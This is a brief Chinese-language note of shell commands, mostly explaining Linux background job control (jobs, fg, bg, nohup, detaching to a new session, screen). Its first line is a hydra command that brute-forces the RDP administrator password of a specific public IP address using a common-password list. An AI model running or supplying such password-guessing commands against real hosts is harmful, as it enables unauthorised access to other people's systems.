#hydra 破解3389端口密码命令
hydra -l administrator -P ./常用密码.txt -f -V 218.28.60.24 rdp
#=================后台执行j程序=======================
jobs          #查看在后台执行的进程
fg %n         #将后台执行进程n调到前台执行，n表示jobnumber（通过jobs查看的进程编号，而非pid）
ctrl+z        #将在前台执行的进程，放到后台并挂起
bg %n         #将在后台挂起的进程，继续执行
ctrl+c        #前台进程终止
kill %n       #杀掉后台运行的进程，n表示jobnumber（通过jobs查看的进程编号，而非pid）
#当用户注销或者网络中断时，终端后收到SIGHUP信号，从而关闭其所有子进程，以上两种方式会随着终端的关闭而退出，如果我们需要作业在后台执行并不受终端退出的影响，可以用下面两种方式
#1、nohup命d令
nohup sh test.sh &>/dev/null &
#nohup命令会忽略SIGHUP信号，从而终端退出时不会影响到后台作业
#2、将作业挂到新的会话下面
#（sh test.sh &>/dev/null &）或者将sh test.sh &>/dev/null &放到另一个脚本中运行都可以实现
#将&也放入（）后，我们会发现所提交的作业并不在作业列表中，也就是说，是无法通过jobs来查看的，通过ps查看发现新的作业的PPID是1而不是终端的PID，所以终端退出后不会影响我们的作业
#三、另外screen命令也可以实现相应的功能，并能解决程序需要人机交互的问题
